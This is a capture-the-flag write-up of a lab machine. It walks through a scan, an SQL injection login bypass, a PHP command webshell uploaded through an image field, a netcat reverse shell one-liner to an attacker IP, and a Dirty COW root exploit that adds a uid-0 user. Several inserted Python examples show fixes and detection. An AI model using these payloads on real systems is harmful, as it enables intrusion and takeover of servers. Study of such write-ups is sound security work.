First enumeration with nmap
# Nmap 7.93 scan initiated Wed May 17 12:13:10 2023 as: nmap -sC -sV -T4 -oN normal.txt -p 22,80 -Pn 10.10.10.6
Nmap scan report for 10.10.10.6
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3ec81b15211550ec6e63bcc56b807b38 (DSA)
|_ 2048 aa1f7921b842f48a38bdb805ef1a074d (RSA)
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.12 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 17 12:13:24 2023 -- 1 IP address (1 host up) scanned in 14.03 seconds
Noticed a web server running on port 80. Opening it in a browser, we get the default web page, so let's fuzz for hidden directories.
┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/HTB/Popcorn]
└─$ dirb http://10.10.10.6/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed May 17 11:43:45 2023
URL_BASE: http://10.10.10.6/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.6/ ----
+ http://10.10.10.6/cgi-bin/ (CODE:403|SIZE:286)
+ http://10.10.10.6/index (CODE:200|SIZE:177)
+ http://10.10.10.6/index.html (CODE:200|SIZE:177)
+ http://10.10.10.6/server-status (CODE:403|SIZE:291)
+ http://10.10.10.6/test (CODE:200|SIZE:47330)
==> DIRECTORY: http://10.10.10.6/torrent/
---- Entering directory: http://10.10.10.6/torrent/ ----
==> DIRECTORY: http://10.10.10.6/torrent/admin/
+ http://10.10.10.6/torrent/browse (CODE:200|SIZE:9278)
+ http://10.10.10.6/torrent/comment (CODE:200|SIZE:936)
+ http://10.10.10.6/torrent/config (CODE:200|SIZE:0)
Cool, we have a juicy directory, torrent. Let's check it out.
Navigating to the torrent directory, we land on a Torrent Hoster CMS. Let's try to log in.
Tried to bypass the login page with the SQLi payload admin' or 1=1-- as both the username and the password.
…
Bull's eye, it worked, we are in as admin. Let's check how to exploit this service, Torrent Hoster. There's a file upload vuln; let's exploit it.
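Why that bypass works, as an added example that is not part of the original writeup or the Torrent Hoster code: an in-memory SQLite login check built the vulnerable way and the parameterized way, fed the same admin' or 1=1-- value. The users table and credentials are constructed for the demo.

```python
import sqlite3

# The value used on the login form above, sent as both username and password.
PAYLOAD = "admin' or 1=1--"

def make_db() -> sqlite3.Connection:
    """Constructed users table; the plaintext password is only for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    conn.commit()
    return conn

def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Query assembled by string concatenation: user input becomes SQL text,
    so the quote closes the literal, or 1=1 is always true, and -- comments
    out the password check."""
    sql = ("SELECT COUNT(*) FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()[0] > 0

def login_hardened(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Same check with bound parameters: the whole payload is compared as a
    plain string against the username column and matches nothing."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0
```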
┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/HTB/Popcorn]
└─$ wget https://cdimage.kali.org/kali-2023.1/kali-linux-2023.1-installer-amd64.iso.torrent
--2023-05-18 00:31:47-- https://cdimage.kali.org/kali-2023.1/kali-linux-2023.1-installer-amd64.iso.torrent
Resolving cdimage.kali.org (cdimage.kali.org)... 192.99.200.113
Connecting to cdimage.kali.org (cdimage.kali.org)|192.99.200.113|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://kali.download/base-images/kali-2023.1/kali-linux-2023.1-installer-amd64.iso.torrent [following]
--2023-05-18 00:31:49-- https://kali.download/base-images/kali-2023.1/kali-linux-2023.1-installer-amd64.iso.torrent
Resolving kali.download (kali.download)... 104.18.103.100, 104.18.102.100, 2606:4700::6812:6664, ...
Connecting to kali.download (kali.download)|104.18.103.100|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 296259 (289K) [application/octet-stream]
Saving to: ‘kali-linux-2023.1-installer-amd64.iso.torrent’
kali-linux-2023.1-installer-amd64.iso.tor 100%[====================================================================================>] 289.32K 284KB/s in 1.0s
2023-05-18 00:31:51 (284 KB/s) - ‘kali-linux-2023.1-installer-amd64.iso.torrent’ saved [296259/296259]
First we download a torrent file, as shown above.
Click the Upload button and upload the torrent file you downloaded, then click the Upload Torrent button.
After the torrent file is uploaded, the page says no image file was found. Click Edit this torrent.
Upload an image file and intercept the request with Burp.
Delete the image content from the request and put in this payload:
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
Replace the image content with the PHP cmd webshell payload above, append .php to the image filename, and send the request. Now let's check for the shell in the /upload directory.
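The mitigation side of this upload bug, as an added example that is not Torrent Hoster's code: the server-side validation an image upload handler should do so that a file renamed to .php, a double extension, or PHP embedded after a valid image header is rejected. The sample file contents are constructed.

```python
import os

# Magic bytes an upload with this extension must start with.
ALLOWED_EXT = {".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff",
               ".png": b"\x89PNG\r\n\x1a\n", ".gif": b"GIF8"}
# Byte sequences that mean the "image" carries PHP source.
PHP_MARKERS = (b"<?php", b"<?=", b"<script language=\"php\"")

def validate_image_upload(filename: str, content: bytes) -> tuple:
    """Return (accepted, reason). Rejects, in order: more than one extension
    (cat.jpg.php), an extension outside the allowlist, content whose header
    does not match that extension, and embedded PHP markers."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "filename must be name.ext with exactly one extension"
    ext = "." + parts[1]
    if ext not in ALLOWED_EXT:
        return False, "extension " + ext + " not in allowlist"
    if not content.startswith(ALLOWED_EXT[ext]):
        return False, "content does not start with " + ext + " magic bytes"
    if any(marker in content for marker in PHP_MARKERS):
        return False, "PHP code embedded in image data"
    return True, "ok"

# Constructed sample uploads covering the cases the step above relies on.
SAMPLES = {
    "real.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,             # genuine JPEG header
    "shell.php": b"<?php echo 'x'; ?>",                          # script named .php
    "pic.jpg.php": b"\xff\xd8\xff\xe0" + b"<?php echo 'x'; ?>",  # double extension
    "poly.gif": b"GIF89a" + b"<?php echo 'x'; ?>",              # valid header, PHP body
}

def check_all() -> dict:
    """Run every sample through the validator; maps name to (accepted, reason)."""
    return {name: validate_image_upload(name, data) for name, data in SAMPLES.items()}
```

Even with these checks, the stored file should get a server-generated name and the upload directory should not be served with PHP execution enabled.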
Cool, we got our PHP shell. Let's check whether we have RCE.
Great, we got RCE. Let's get a reverse shell. Fire up an ncat listener and use this reverse shell payload:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.14 445 >/tmp/f
Send the payload and check back on the ncat listener.
┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/HTB/Popcorn]
└─$ ncat -lnvp 445
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::445
Ncat: Listening on 0.0.0.0:445
Ncat: Connection from 10.10.10.6.
Ncat: Connection from 10.10.10.6:42739.
bash: no job control in this shell
www-data@popcorn:/var/www/torrent/upload$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@popcorn:/var/www/torrent/upload$
Bingo, we got a reverse shell.
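From the detection side, as an added example that is not part of the writeup: a small scanner over Apache combined-format access log lines that flags what this step leaves behind in the logs, a PHP file served from /torrent/upload/ and requests carrying a cmd= parameter. The log lines, IPs and filenames are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Enough of the combined log format to recover method, request path and status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})')
# Directories that hold user uploads and should never serve PHP.
UPLOAD_DIRS = ("/torrent/upload/",)

def classify(line: str) -> list:
    """Return the reasons a request looks like webshell activity (empty if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m.group("path"))
    reasons = []
    if url.path.lower().endswith(".php") and url.path.startswith(UPLOAD_DIRS):
        reasons.append("php executed from upload dir")
    if "cmd" in parse_qs(url.query):
        reasons.append("cmd parameter")
    return reasons

# Constructed log lines: normal browsing, the dropped shell being fetched,
# a command issued through it, and a legitimate image from the same directory.
SAMPLE_LOG = [
    '10.10.14.14 - - [18/May/2023:00:40:01 +0000] "GET /torrent/browse.php HTTP/1.1" 200 9278 "-" "Mozilla/5.0"',
    '10.10.14.14 - - [18/May/2023:00:41:12 +0000] "GET /torrent/upload/abc123.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '10.10.14.14 - - [18/May/2023:00:41:30 +0000] "GET /torrent/upload/abc123.php?cmd=id HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
    '10.10.14.14 - - [18/May/2023:00:42:00 +0000] "GET /torrent/upload/abc123.jpg HTTP/1.1" 200 47330 "-" "Mozilla/5.0"',
]

def scan(lines) -> list:
    """Return (line_number, reasons) for every suspicious line."""
    hits = []
    for number, line in enumerate(lines, 1):
        reasons = classify(line)
        if reasons:
            hits.append((number, reasons))
    return hits
```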
Privilege Escalation
www-data@popcorn:/tmp$ uname -a
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
www-data@popcorn:/tmp$
Checking the kernel version, we can see it is running an old version of Ubuntu. Let's try the Dirty COW exploit. Found one using searchsploit (40839.c). Let's send it to the target and compile it.
www-data@popcorn:/tmp$ wget http://10.10.14.14/40839.c
--2023-05-18 22:14:33-- http://10.10.14.14/40839.c
Connecting to 10.10.14.14:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4814 (4.7K) [text/x-csrc]
Saving to: `40839.c'
100%[==============================================================================================>] 4,814 --.-K/s in 0.008s
2023-05-18 22:14:33 (604 KB/s) - `40839.c' saved [4814/4814]
www-data@popcorn:/tmp$ gcc -pthread 40839.c dirty -lcrypt
gcc: dirty: No such file or directory
www-data@popcorn:/tmp$ gcc -pthread 40839.c -o dirty -lcrypt
www-data@popcorn:/tmp$ ls -al dirty
-rwxr-xr-x 1 www-data www-data 13603 May 18 22:15 dirty
www-data@popcorn:/tmp$
The exploit is on the target and compiled. Now let's run it.
www-data@popcorn:/tmp$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:
Complete line:
firefart:fiOEyJZz3b5lA:0:0:pwned:/root:/bin/bash
mmap: b787c000
^C
www-data@popcorn:/tmp$ su firefart
Password:
firefart@popcorn:/tmp# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@popcorn:/tmp#
Running the exploit, it backs up /etc/passwd, asks for a password we can use to log in, and modifies the current file to create a user firefart with root privileges (uid 0, as the id output shows). Bull's eye, got root.
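The artefact this leaves on the host, as an added example that is not part of the writeup or the exploit: a check over /etc/passwd contents that flags a second uid 0 account, a password hash stored in passwd instead of shadow, a missing root entry, and any account absent from the backup the exploit wrote. Both passwd contents are constructed, with the firefart line above as the suspect entry.

```python
# Constructed /etc/passwd contents: the baseline before the exploit and the
# state afterwards, with the firefart line shown above as the suspect entry.
PASSWD_BEFORE = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
"""
PASSWD_AFTER = """firefart:fiOEyJZz3b5lA:0:0:pwned:/root:/bin/bash
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
"""

def parse_passwd(text: str) -> list:
    """Split passwd text into dicts; lines without 7 fields or a numeric uid
    are kept as malformed so the audit can report them."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7 or not f[2].isdigit():
            entries.append({"name": line, "malformed": True})
            continue
        entries.append({"name": f[0], "pw": f[1], "uid": int(f[2]),
                        "shell": f[6], "malformed": False})
    return entries

def audit_passwd(current: str, baseline: str = "") -> list:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    entries = parse_passwd(current)
    names = {e["name"] for e in entries if not e["malformed"]}
    if "root" not in names:
        findings.append("root entry missing")
    for e in entries:
        if e["malformed"]:
            findings.append("malformed line: " + e["name"])
            continue
        if e["uid"] == 0 and e["name"] != "root":
            findings.append("uid 0 account " + repr(e["name"]))
        # With shadow passwords in use the field is x (or * / ! when locked);
        # a real hash here is exactly what the exploit wrote.
        if e["pw"] not in ("x", "*", "!", ""):
            findings.append("password hash in passwd for " + repr(e["name"]))
    if baseline:
        base = {e["name"] for e in parse_passwd(baseline) if not e["malformed"]}
        for name in sorted(names - base):
            findings.append("account " + repr(name) + " not in baseline")
    return findings
```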
And we are through... Had fun, yeah? 😉